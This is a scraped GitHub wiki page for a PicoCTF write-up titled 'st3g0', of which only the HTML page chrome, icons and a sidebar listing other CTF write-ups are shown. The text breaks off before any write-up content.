1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> </div> </label></form> </div></div> </div> <div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div> Sign up </div> </div> </div> </div></header> </div> <div id="start-of-content" class="show-on-focus"></div> <div id="js-flash-container" data-turbo-replace> <template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div> </div> </div></div> </template></div> <include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment> <div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" > <div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace> <div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;"> <div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> not1cyyy </span> <span>/</span> CTF-Writeups <span></span><span>Public</span> </div> </div> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>0</span> <div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>7</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div> </div> <div id="responsive-meta-container" data-turbo-replace></div> <nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-book UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75A.75.75 0 0 1 .75 1h4.253c1.227 0 2.317.59 3 1.501A3.743 3.743 0 0 1 11.006 1h4.245a.75.75 0 0 1 .75.75v10.5a.75.75 0 0 1-.75.75h-4.507a2.25 2.25 0 0 0-1.591.659l-.622.621a.75.75 0 0 1-1.06 0l-.622-.621A2.25 2.25 0 0 0 5.258 13H.75a.75.75 0 0 1-.75-.75Zm7.251 10.324.004-5.073-.002-2.253A2.25 2.25 0 0 0 5.003 2.5H1.5v9h3.757a3.75 3.75 0 0 1 1.994.574ZM8.755 4.75l-.004 7.322a3.752 3.752 0 0 1 1.992-.572H14.5v-9h-3.495a2.25 2.25 0 0 0-2.25 2.25Z"></path></svg> <span>Wiki</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/not1cyyy/CTF-Writeups/security/overall-count" accept="text/fragment+html"></include-fragment> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span> <div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Wiki Security Insights </details-menu></details></div></nav> </div> <turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " > <div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4 page" id="wiki-wrapper"> <div class="d-flex flex-column flex-md-row gh-header"> <h1 class="flex-auto min-width-0 mb-2 mb-md-0 mr-0 mr-md-2 gh-header-title">PicoCTF : st3g0</h1> <div class="mt-0 mt-lg-1 flex-shrink-0 gh-header-actions"> Jump to bottom </div> </div> <div class="mt-2 mt-md-1 pb-3 gh-header-meta"> Firas Chaib edited this page <relative-time datetime="2022-04-16T16:28:13Z" class="no-wrap">Apr 16, 2022</relative-time> · 1 revision </div> <div id="wiki-content" class="mt-4"> <div data-view-component="true" class="Layout Layout--flowRow-until-md Layout--sidebarPosition-end Layout--sidebarPosition-flowRow-end"> <div data-view-component="true" class="Layout-sidebar"> <div class="wiki-rightbar"> <div id="wiki-pages-box" class="mb-4 wiki-pages-box js-wiki-pages-box" role="navigation"> <div class="Box Box--condensed color-shadow-small"> <div class="Box-header js-wiki-toggle-collapse" style="cursor: pointer"> <h3 class="Box-title"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toggle-display"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-right js-wiki-sidebar-toggle-display d-none"> <path d="m6.427 4.427 3.396 3.396a.25.25 0 0 1 0 .354l-3.396 3.396A.25.25 0 0 1 6 11.396V4.604a.25.25 0 0 1 .427-.177Z"></path></svg> Pages <span>14</span> </h3> </div> <div class=" js-wiki-sidebar-toggle-display"> <div class="filter-bar"> <input type="text" id="wiki-pages-filter" class="form-control input-sm input-block js-filterable-field" placeholder="Find a page…" aria-label="Find a page…"> </div> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Home</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Home/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> GDG Algiers CTF : franklin last words</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/GDG-Algiers-CTF-:-franklin-last-words/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PatriotCTF : Banner</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PatriotCTF-:-Banner/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PatriotCTF : CoruptAAAAd</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PatriotCTF-:-CoruptAAAAd/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : Eavesdrop</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-Eavesdrop/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : Operation Oni</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-Operation-Oni/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : Sleuthkit Apprentice</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-Sleuthkit-Apprentice/_toc"> </include-fragment></details> <details class="details-reset" open> <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon 